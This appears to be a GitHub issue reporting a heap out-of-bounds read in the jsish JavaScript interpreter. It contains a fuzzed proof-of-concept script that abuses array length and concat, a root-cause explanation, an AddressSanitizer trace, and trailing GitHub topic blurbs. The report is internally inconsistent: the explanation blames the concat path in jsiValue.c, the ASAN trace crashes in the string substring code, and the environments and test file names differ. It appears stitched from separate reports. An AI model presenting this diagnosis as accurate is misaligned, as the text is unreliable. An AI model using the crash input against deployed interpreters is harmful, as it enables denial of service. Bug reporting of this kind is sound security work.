operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1
var o = [
1,
2
];
o.length = ~-4294967297;
var Shek = o.concat(o, o, o);
var ytbj = JSON.stringify('TrT{IlX88;Pc&6KbA$5dJn');
o = o.concat(o, o, o);
var Pcmm = o.reduce(function () {
}, o.length);
var Xtjk = o.concat(o, o, o);
Xtjk = o.concat(o, o, o);
Shek = Shek.forEach(function () {
}, o.length);
var HxDr = 759250124 == o.length;
var mscw = JSON.stringify('+ÌDDú\x05jr\xB3\x0F\x13R\x0FB7\xA9\xA3G\xA0\x16');
var KGeW = new WeakSet([
[3.1589793],
[]
]);
var KhcQ = new Map([
[],
[
o.length,
o.length,
-2147483648
]
]);
o = o.splice(o.length, o.length, o, o, o.length, 1.7976931348623157e+308);
var rbQB = o.forEach(function () {
}, o);
var a = Object.keys(o);
var APSB = -9007199254740990 != a.length;
The vulnerable code is on line src / jsiValue.c + 261, the functionc jsi_ValueCopyMove, the affected code is as follows:
The address pointed by from is illegal, that is, illegal memory access.
In the process of parsing js, when encountering the contact function of js, jsish will call the parsing function jsi_ArrayConcatCmd
The curlen here is obtained by Jsi_ObjGetLength, as shown in the figure:
But curlen can be changed at will, and the for loop of src / jsiArray.c + 323 is not verified, it is easy to cross the boundary. In addition, the for loop calls the Jsi_ValueDup2 function, so that you can copy the content beyond the boundary.
Ubuntu 16.04
gcc 5.4.0
version: c95c897
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc
Target device:
Desktop Linux
Below is the ASAN outputs.
=================================================================
==124748==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000c594 at pc 0x7fc9b3851935 bp 0x7ffe05c465a0 sp 0x7ffe05c45d48
READ of size 4 at 0x60200000c594 thread T0
#0 0x7fc9b3851934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934)
#1 0x5a2f41 in memcpy /usr/include/x86_64-linux-gnu/bits/string3.h:53
#2 0x5a2f41 in Jsi_DSAppendLen src/jsiDString.c:109
#3 0x5cd571 in Jsi_UtfSubstr src/jsiUtf8.c:130
#4 0x4c517d in StringSubstringCmd src/jsiString.c:193
#5 0x4a82f8 in jsi_FuncCallSub src/jsiProto.c:244
#6 0x72059a in jsiFunctionSubCall src/jsiEval.c:790
#7 0x72059a in jsiEvalFunction src/jsiEval.c:825
#8 0x72059a in jsiEvalCodeSub src/jsiEval.c:1250
#9 0x73335f in jsi_evalcode src/jsiEval.c:2190
#10 0x4a93bd in jsi_FuncCallSub src/jsiProto.c:220
#11 0x720371 in jsiFunctionSubCall src/jsiEval.c:790
#12 0x720371 in jsiEvalFunction src/jsiEval.c:825
#13 0x720371 in jsiEvalCodeSub src/jsiEval.c:1250
#14 0x73335f in jsi_evalcode src/jsiEval.c:2190
#15 0x736037 in jsi_evalStrFile src/jsiEval.c:2496
#16 0x47e0ee in Jsi_Main src/jsiInterp.c:917
#17 0x90be3e in jsi_main src/main.c:44
#18 0x7fc9b2cf183f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#19 0x418238 in _start (/home/keven/Fuzzing/jsish-1023/jsish+0x418238)
0x60200000c594 is located 0 bytes to the right of 4-byte region [0x60200000c590,0x60200000c594)
allocated by thread T0 here:
#0 0x7fc9b385d602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x4825c2 in Jsi_Malloc src/jsiUtils.c:52
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy
Shadow bytes around the buggy address:
0x0c047fff9860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9890: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff98a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fd fa
=>0x0c047fff98b0: fa fa[04]fa fa fa fd fa fa fa fd fa fa fa fd fd
0x0c047fff98c0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff98d0: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff98e0: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
0x0c047fff98f0: fa fa fd fa fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff9900: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==124748==ABORTING
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.